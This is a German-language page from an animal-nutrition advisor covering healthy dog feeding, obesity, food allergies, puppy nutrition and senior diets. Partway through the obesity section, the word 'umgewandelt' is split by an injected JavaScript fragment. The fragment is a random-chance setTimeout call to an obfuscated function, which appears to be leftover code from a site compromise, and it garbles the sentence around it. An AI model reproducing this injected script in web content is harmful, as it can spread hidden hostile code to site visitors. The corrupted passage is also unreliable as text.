Gesunde Ernährung für Hunde

  • Empfiehlt sich bei meinem Hund eine BARF-Fütterung/Teilbarfen?
  • Soll es trocken oder aus der Dose sein?
  • Welches Futter ist das Richtige für meinen Hund?
  • Enthält mein Futter alles Wichtige, was mein Tier benötigt?
  • Was bedeuten die Angaben auf der Verpackung? Worauf muss ich achten?
  • Reicht das Futter alleine aus oder empfiehlt sich eine Ergänzung? → Welche Ergänzung könnte sinnvoll und welche evtl. kontraproduktiv sein?
  • Mein Tier ist krank, welches Futter eignet sich und welches nicht? Worauf muss ich hierbei achten?
  • Wie kann ich meinen alten Hund mit Futterergänzungsmitteln unterstützen?

Zu allen Fragen rund um das Thema Ernährung kläre ich Sie gerne auf und berate Sie zum richtigen Futter für Ihren Liebling.

Übergewicht

50% aller Hunde sind zu dick.
Übergewicht ist kein Schönheitsfehler, sondern eine Krankheit mit schwerwiegenden Folgen.

Fettleibigkeit (med.: Adipositas) ist die häufigste ernährungsbedingte Erkrankung unserer Heimtiere. Übergewicht hat nicht nur schwerwiegende Folgen für die Gesundheit Ihres Lieblinges, sondern auch für seine Lebensqualität.
„Dickerchen“ haben ein erhöhtes Risiko für eine Vielzahl von Krankheiten wie Diabetes, Herz-/Kreislauferkrankungen und Erkrankungen des Bewegungsapparates (insbesondere der Gelenke), sowie diverse Tumorerkrankungen. Eine Langzeitstudie zeigte, dass die Lebenszeit bei übergewichtigen Tieren 20% kürzer ist, als die normalgewichtiger Tiere.

Wie kommt es zu Übergewicht?
Das Tier frisst zu viel und oft leider auch das Falsche. Durch Bewegungsmangel wird das stetige Zunehmen noch begünstigt. Die zu viel gefütterten Kalorien werden nicht verbraucht, sondern in Fett umgewandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelt, das sich in Form von Fettpolstern unter der Haut und um die inneren Organe ablagert. Die normalen Körperfunktionen können so beeinträchtigt werden.
Kastrierte Tiere haben ein zusätzlich erhöhtes Risiko für Übergewicht. Wenn das Tier kastriert wird, verändert sich sein Stoffwechsel, bei vermehrter Futteraufnahme und gleichzeitig verminderter Aktivität nimmt das Tier stetig zu. Auch unsere Oldies neigen häufig zu Übergewicht, da der Energiebedarf im Alter sinkt.

Sinnvoll eingesetzte Futtermittel, ein gutes Leckerli-Management erleichtern die vom Besitzer notwendige Konsequenz und sorgen dafür, dass Ihr Tier abnimmt ohne zu hungern.

Unter Berücksichtigung Ihrer Wünsche und Lebensumstände erstelle ich Ihnen einen optimalen Ernährungs-und Bewegungsplan für Ihr Tier, der zu einem dauerhaften Abnehmerfolg führt.

Futtermittelunverträglichkeit (Allergie)

Sehr viele unserer Hunde leiden mittlerweile an einer Futtermittelunverträglichkeit, bei der meistens eine Unverträglichkeit gegen Eiweiß (pflanzlichen oder tierischen Ursprungs) der Auslöser ist.

Das Tier leidet an Haut- (Ohrenentzündungen, Analdrüsenentzündung, Juckreiz, v.a. An den Pfoten, den Achseln, den Schenkelinnenflächen etc.) und/oder Verdauungsproblemen (Durchfall, Erbrechen, Blähungen…).

Wenn Sie den Verdacht haben, dass Ihr Tier an einer Allergie leidet, berate ich Sie gerne.

Sie erwarten tierischen Nachwuchs? Wie finde ich das richtige Welpenfutter?

In 95% der Fällen, in denen Hunde Wachstumsstörungen haben, ist die Fütterung schuld (Dobenecker, et al., 1999).

Die Fütterung Ihres Welpen ist ausschlaggebend für ein gesundes Wachstum, um körperliche Langzeitschäden, verursacht durch falsche Fütterung während des Wachstums, zu verhindern.
Leider kommen Fütterungsfehler im Welpenalter sehr häufig vor. Sowohl bei Selbstgekochtem, als auch bei der Fütterung von Trocken-/oder Nassfutter, sowie B.A.R.F.-Rationen.

Besonders Welpen großwüchsiger Rassen sind während der Hauptwachstumsphase (3.-6. Lebensmonat) gefährdet.

Die beiden häufigsten Fehler sind 1.) eine zu hohe Energieaufnahme, also schlichtweg zu viel Futter und 2.) eine Fehlversorgung mit Calcium und/oder Phosphor.

Durch eine zu hohe Futteraufnahme wachsen die Welpen zu schnell, was man ihnen leider meist nicht ansieht, da sie nicht dick werden, sondern einfach in die Höhe wachsen, d.h. Sie sind für ihr Alter zu groß bzw. zu schwer.

Eine Fehlversorgung mit Calcium und/oder Phosphor kommt hauptsächlich bei hausgemachten Rationen oder fehlerhaften Ergänzungen mit Mineralpräparaten vor.

Sind Sie sich unsicher, ob Sie Ihrem Welpen das richtige Futter füttern oder möchten Sie wissen, welches Futter für Ihren Welpen geeignet ist und wie viel er davon benötigt?
Ich berate Sie gerne.

Senioren

Unsere Hunde sollten im Alter auf ein Seniorenfutter umgestellt werden, denn die körperlichen Veränderungen stellen besondere Anforderungen an die Ernährung.
Im Alter sinkt der Energiebedarf und oftmals kommt es zu einer Muskelatrophie (Muskelabbau), was den Energiebedarf weiter senkt.
Mit zunehmendem Alter steigt aber auch das Krankheitsrisiko, was bei der Fütterung berücksichtigt werden sollte.

Sprechen Sie mich gerne an.